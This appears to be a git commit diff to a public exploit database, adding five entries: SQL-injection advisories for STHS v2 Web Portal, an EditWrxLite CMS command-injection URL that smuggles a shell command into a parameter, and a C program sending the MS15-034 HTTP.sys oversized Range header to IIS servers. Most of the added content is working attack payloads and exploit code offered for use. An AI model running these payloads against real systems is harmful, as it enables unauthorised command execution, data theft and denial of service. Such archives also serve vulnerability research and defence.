DB: 2015-04-17
5 new exploits
This commit is contained in:
parent
68ad4cade7
commit
02af60276e
6 changed files with 147 additions and 0 deletions
|
@ -33169,3 +33169,8 @@ id,file,description,date,author,platform,type,port
|
||||||
36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
|
36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
|
||||||
36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0
|
36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0
|
||||||
36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
|
36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
|
||||||
|
36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
|
||||||
|
36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
|
||||||
|
36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
|
||||||
|
36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0
|
||||||
|
36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
|
||||||
|
|
Can't render this file because it is too large.
|
7
platforms/cgi/webapps/36772.txt
Executable file
7
platforms/cgi/webapps/36772.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
source: http://www.securityfocus.com/bid/51995/info
|
||||||
|
|
||||||
|
EditWrxLite CMS is prone to a remote command-execution vulnerability.
|
||||||
|
|
||||||
|
Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application.
|
||||||
|
|
||||||
|
http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a|
|
9
platforms/php/webapps/36769.txt
Executable file
9
platforms/php/webapps/36769.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/51991/info
|
||||||
|
|
||||||
|
STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/prospects.php?team=[SQLi]'
|
9
platforms/php/webapps/36770.txt
Executable file
9
platforms/php/webapps/36770.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/51991/info
|
||||||
|
|
||||||
|
STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/prospect.php?team=[SQLi]'
|
9
platforms/php/webapps/36771.txt
Executable file
9
platforms/php/webapps/36771.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/51991/info
|
||||||
|
|
||||||
|
STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/team.php?team=[SQLi]'
|
108
platforms/windows/dos/36773.c
Executable file
108
platforms/windows/dos/36773.c
Executable file
|
@ -0,0 +1,108 @@
|
||||||
|
/*
|
||||||
|
UNTESTED - MS15-034 Checker
|
||||||
|
|
||||||
|
THE BUG:
|
||||||
|
|
||||||
|
8a8b2112 56 push esi
|
||||||
|
8a8b2113 6a00 push 0
|
||||||
|
8a8b2115 2bc7 sub eax,edi
|
||||||
|
8a8b2117 6a01 push 1
|
||||||
|
8a8b2119 1bca sbb ecx,edx
|
||||||
|
8a8b211b 51 push ecx
|
||||||
|
8a8b211c 50 push eax
|
||||||
|
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
|
||||||
|
|
||||||
|
ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
|
||||||
|
|
||||||
|
BY: john.b.hale@gmai.com
|
||||||
|
Twitter: @rhcp011235
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <netinet/in.h>
|
||||||
|
#include <netdb.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <errno.h>
|
||||||
|
#include <arpa/inet.h>
|
||||||
|
|
||||||
|
int connect_to_server(char *ip)
|
||||||
|
{
|
||||||
|
int sockfd = 0, n = 0;
|
||||||
|
|
||||||
|
struct sockaddr_in serv_addr;
|
||||||
|
struct hostent *server;
|
||||||
|
|
||||||
|
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
|
||||||
|
{
|
||||||
|
printf("\n Error : Could not create socket \n");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
memset(&serv_addr, '0', sizeof(serv_addr));
|
||||||
|
serv_addr.sin_family = AF_INET;
|
||||||
|
serv_addr.sin_port = htons(80);
|
||||||
|
if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)
|
||||||
|
{
|
||||||
|
printf("\n inet_pton error occured\n");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
|
||||||
|
{
|
||||||
|
printf("\n Error : Connect Failed \n");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
return sockfd;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
int main(int argc, char *argv[])
|
||||||
|
{
|
||||||
|
int n = 0;
|
||||||
|
int sockfd;
|
||||||
|
char recvBuff[1024];
|
||||||
|
|
||||||
|
// Check server
|
||||||
|
char request[] = "GET / HTTP/1.0\r\n\r\n";
|
||||||
|
|
||||||
|
// our evil buffer
|
||||||
|
char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
|
||||||
|
|
||||||
|
|
||||||
|
if(argc != 2)
|
||||||
|
{
|
||||||
|
printf("\n Usage: %s <ip of server> \n",argv[0]);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("[*] Audit Started\n");
|
||||||
|
sockfd = connect_to_server(argv[1]);
|
||||||
|
write(sockfd, request, strlen(request));
|
||||||
|
read(sockfd, recvBuff, sizeof(recvBuff)-1);
|
||||||
|
|
||||||
|
if (!strstr(recvBuff,"Microsoft"))
|
||||||
|
{
|
||||||
|
printf("[*] NOT IIS\n");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
sockfd = connect_to_server(argv[1]);
|
||||||
|
write(sockfd, request1, strlen(request1));
|
||||||
|
read(sockfd, recvBuff, sizeof(recvBuff)-1);
|
||||||
|
if (strstr(recvBuff,"Requested Range Not Satisfiable"))
|
||||||
|
{
|
||||||
|
printf("[!!] Looks VULN\n");
|
||||||
|
exit(1);
|
||||||
|
} else if(strstr(recvBuff,"The request has an invalid header name")) {
|
||||||
|
printf("[*] Looks Patched");
|
||||||
|
} else
|
||||||
|
printf("[*] Unexpected response, cannot discern patch status");
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
}
|
Loading…
Add table
Reference in a new issue